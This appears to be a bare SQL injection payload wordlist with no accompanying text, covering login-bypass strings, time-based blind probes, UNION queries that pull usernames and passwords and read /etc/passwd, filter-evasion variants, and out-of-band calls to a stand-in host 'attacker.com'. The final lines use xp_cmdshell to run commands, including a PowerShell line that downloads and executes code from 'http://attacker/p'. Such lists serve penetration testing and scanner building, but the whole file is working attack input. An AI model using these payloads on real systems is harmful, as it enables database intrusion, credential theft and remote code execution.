'
" 
')
")
'--
"--
')--
")--
'or'1'='1
"or"1"="1
or 1=1
' or 1=1--
" or 1=1--
'or'1'='1'--
"or"1"="1"--
admin'--
admin' #
' or '1'='1' {-- }
' or 1=1 limit 1 --
1' or '1'='1
1" or "1"="1
1) or (1=1
1' or sleep(5)#
1' or sleep(5)="
1 waitfor delay '0:0:5'
1);WAITFOR DELAY '0:0:5'--
1');WAITFOR DELAY '0:0:5'--
1' AND SLEEP(5)--
1" AND SLEEP(5)--
1' AND pg_sleep(5)--
1' AND BENCHMARK(5000000,MD5(1))--
1' AND GTID_SUBSET(CONCAT(0x717a6b6271,(SELECT+MD5(1)),0x7178707871),1)--
";SELECT pg_sleep(5)--
' UNION SELECT NULL--
' UNION SELECT NULL,NULL--
' UNION SELECT NULL,NULL,NULL--
' UNION SELECT @@version--
' UNION SELECT version(),current_database()--
' UNION SELECT database(),user()--
' UNION SELECT username,password FROM users--
' UNION ALL SELECT 1,2,3--
' UNION ALL SELECT NULL,NULL,@@version--
' UNION ALL SELECT CONCAT(username,':',password) FROM users--
' UNION SELECT table_name,NULL FROM information_schema.tables--
' UNION SELECT column_name,NULL FROM information_schema.columns WHERE table_name='users'--
1' ORDER BY 1--
1' ORDER BY 2--
1' ORDER BY 3--
1' ORDER BY 10--
1' GROUP BY CONCAT(0x7178717a71,(SELECT version()),0x717a7a6271)--
1' AND ASCII(SUBSTRING((SELECT database()),1,1))>64--
1' AND (SELECT COUNT(*) FROM information_schema.tables)>0--
1' AND (SELECT CASE WHEN (1=1) THEN 1 ELSE 0 END)=1--
1' AND EXISTS(SELECT 1 FROM users)--
1' AND 1=(SELECT COUNT(*) FROM pg_sleep(5))--
1' AND 1=(SELECT 1 FROM pg_sleep(5))--
1' AND (SELECT CASE WHEN (SELECT COUNT(*) FROM users)>0 THEN pg_sleep(5) ELSE 0 END)--
1' AND IF(1=1,SLEEP(5),0)--
1' AND IF((SELECT LENGTH(database()))>0,SLEEP(5),0)--
1' AND IF(ASCII(SUBSTRING(database(),1,1))>64,SLEEP(5),0)--
1' AND IF(SUBSTRING(@@version,1,1)='5',SLEEP(5),0)--
1' AND CASE WHEN (username='admin') THEN SLEEP(5) ELSE 0 END--
" OR ""="
' OR ''='
" OR ""="
' OR 'a'='a
" OR "a"="a
' OR 1=1#
" OR 1=1#
) OR 1=1--
)) OR (('a'='a
)) OR ((1=1)
1' HAVING 1=1--
1' HAVING SLEEP(5)--
1' AND extractvalue(1,concat(0x5c,(SELECT user())))--
1' AND updatexml(1,concat(0x5c,(SELECT user())),1)--
1' /*!50000 UNION SELECT @@version,2-- -*/
1' /*!12345SELECT*/ 1,2,3--
1' /*!50000AND*/ 1=1--
0';EXEC xp_cmdshell('ping attacker.com')--
'; exec master..xp_dirtree '\\\\attacker\\share'--
'; DECLARE @q NVARCHAR(200);SET @q='ping attacker.com';EXEC (@q);
'; DECLARE @x XML '<r>&lt;/r>';SELECT @x;--
1%27%20OR%201=1--
1%27%20AND%20SLEEP(5)--
1%27%20UNION%20SELECT%201,2,3--
-1' UNION SELECT 1,@@version--
-1' UNION SELECT 1,load_file('/etc/passwd')--
1" OR SLEEP(5)="
";WAITFOR DELAY '0:0:5'--
admin' AND '1'='1
admin' AND SLEEP(5)--
' AND 'x'='x
' AND 'x'='y
'+OR+1=1--
"+OR+1=1--
'/**/OR/**/1=1--
"/**/OR/**/1=1--
'+UNION+SELECT+NULL--
'+UNION+SELECT+NULL,NULL--
'+UNION+SELECT+NULL,NULL,NULL--
'||UTL_HTTP.REQUEST('http://attacker.com/')||'
'||CTXSYS.DRITHSX.SN(1,(SELECT user FROM dual))||'
"||DBMS_XMLGEN.getxml('select user from dual')||"
'||(select banner from v$version where rownum=1)||'
1' AND JSON_KEYS((SELECT JSON_OBJECT('a',@@version))) IS NOT NULL--
1' AND (SELECT COUNT(*) FROM mysql.user)>0--
1' AND (SELECT COUNT(*) FROM INFORMATION_SCHEMA.SCHEMATA)>0--
1' AND TO_CHAR(DBMS_PIPE.RECEIVE_MESSAGE('X',5)) IS NOT NULL--
1' AND dbms_lock.sleep(5)--
'||dbms_pipe.receive_message('a',5)||'
'||UTL_INADDR.get_host_address('attacker.com')||'
'||(SELECT version())||'
1' AND (SELECT 1 FROM pg_catalog.pg_sleep(5))--
\' OR 1=1--
\" OR 1=1--
")) UNION SELECT NULL--
')) UNION SELECT NULL--
1') AND (SELECT 1 FROM dual)=1--
1') AND (SELECT dbms_pipe.receive_message('X',5)) IS NULL--
1';EXEC xp_cmdshell('dir');--
1';EXEC master..xp_cmdshell 'powershell -c "IEX(New-Object Net.WebClient).DownloadString(''http://attacker/p'')"';--
